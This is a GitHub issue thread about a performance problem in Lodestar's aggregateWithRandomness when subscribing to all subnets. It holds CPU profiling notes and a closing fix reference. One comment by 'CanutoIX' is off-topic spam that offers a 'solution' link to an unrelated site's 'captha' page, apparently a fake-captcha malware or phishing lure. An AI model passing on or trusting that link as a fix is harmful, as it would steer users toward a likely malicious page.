### ISSUE TITLE
aggregateWithRandomness performance issue when subscribing to all subnets

### ISSUE THREAD

**Issue by twoeths** [ChainSafe/lodestar#7197]
### Describe the bug

It takes up to 3 minutes on holesky for `aggregateWithRandomness` when subscribing to all subnets

<img width="1319" alt="Screenshot 2024-10-25 at 13 55 45" src="https://github.com/user-attachments/assets/2d31d0ee-d625-46f9-9fff-7365769aa1a7">

considering 1 epoch = 6.4 minutes, this takes almost 50% of main thread cpu time this cause performance issue for attached validators

cpu profile shows 51.6% for this time

<img width="1314" alt="Screenshot 2024-10-25 at 13 59 56" src="https://github.com/user-attachments/assets/e994efe9-7018-423d-8cbe-a3cec6138082">

[holesky_subscribe_all_subnets_network.cpuprofile.zip](https://github.com/user-attachments/files/17517479/holesky_subscribe_all_subnets_network.cpuprofile.zip)
[holesky_subscribe_all_subnets_main.cpuprofile.zip](https://github.com/user-attachments/files/17517482/holesky_subscribe_all_subnets_main.cpuprofile.zip)

### Expected behavior

reduce this time, or consider offload this to native using async/await call
cc @wemeetagain @matthewkeil 

### Operating system

Linux

### Lodestar version or commit hash

unstable, v1.22.0

**Comment by twoeths** [comment]
`beacon_attestation` messages per slot increased from <3k to ~45k since we turned `subscribe_all_subnets` flag on

<img width="1331" alt="Screenshot 2024-10-25 at 14 15 16" src="https://github.com/user-attachments/assets/680522d4-9253-46e8-9055-0f935cbba710">

**Comment by CanutoIX** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by matthewkeil** [comment]
Closed by #7204.  Might be some more optimizations possible by tuning the number of libuv threads though
